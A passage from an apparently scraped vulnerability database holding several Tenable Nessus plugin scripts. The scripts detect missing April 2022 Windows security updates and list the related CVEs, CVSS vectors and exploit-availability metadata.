script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012670. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2022-24484,\n CVE-2022-24538, CVE-2022-26784, CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012639 or Cumulative Update 5012670\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012670',\n '5012639'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012670, 5012639])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:50", "description": "The remote Windows host is missing security update 5012632 or cumulative update 5012658. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-26916, CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917, CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983, \tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26797, CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801, CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2022-24498)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012632: Windows Server 2008 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012632.NASL", "href": "https://www.tenable.com/plugins/nessus/159684", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159684);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n 
\"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012632\");\n script_xref(name:\"MSKB\", value:\"5012658\");\n script_xref(name:\"MSFT\", value:\"MS22-5012632\");\n script_xref(name:\"MSFT\", value:\"MS22-5012658\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012632: Windows Server 2008 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012632\nor cumulative update 5012658. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2022-26916,\n CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917,\n CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983,\n\tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26797,\n CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801,\n CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
\"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26831\",\n \"CVE-2022-26832\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012653\");\n script_xref(name:\"MSFT\", value:\"MS22-5012653\");\n script_xref(name:\"IAVA\", value:\"2022-A-0143-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012653. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26798, CVE-2022-26801, CVE-2022-26786, \n CVE-2022-24549, CVE-2022-26794, CVE-2022-26802, \n CVE-2022-26792, CVE-2022-26797, CVE-2022-26787, \n CVE-2022-26803, CVE-2022-26796, CVE-2022-26790, \n CVE-2022-26904, CVE-2022-26808, CVE-2022-26788, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24550, CVE-2022-24547, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530, CVE-2022-26807)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916, \n CVE-2022-26919, CVE-2022-26917, CVE-2022-26809, \n CVE-2022-26918, CVE-2022-24541, CVE-2022-24492, \n CVE-2022-24491, CVE-2022-24534, CVE-2022-24485, \n CVE-2022-24533, CVE-2022-26903, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493, CVE-2022-24498,\n CVE-2022-24483)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012653\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012653\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012653'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012653])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:11", "description": "The remote Windows host is missing security update 5012666 or cumulative update 5012650. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-26812, CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916, CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528, CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26796, CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807, CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801, CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012666: Windows Server 2012 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26784", "CVE-2022-26787", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012666.NASL", "href": "https://www.tenable.com/plugins/nessus/159676", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159676);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n 
\"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26784\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012650\");\n script_xref(name:\"MSKB\", value:\"5012666\");\n script_xref(name:\"MSFT\", value:\"MS22-5012650\");\n script_xref(name:\"MSFT\", value:\"MS22-5012666\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012666: Windows Server 2012 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012666\nor cumulative update 5012650. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26812,\n CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916,\n CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528,\n CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26796,\n CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807,\n CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801,\n CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012650\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012666 or Cumulative Update 5012650\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft 
Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012666',\n '5012650'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012666, 5012650])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 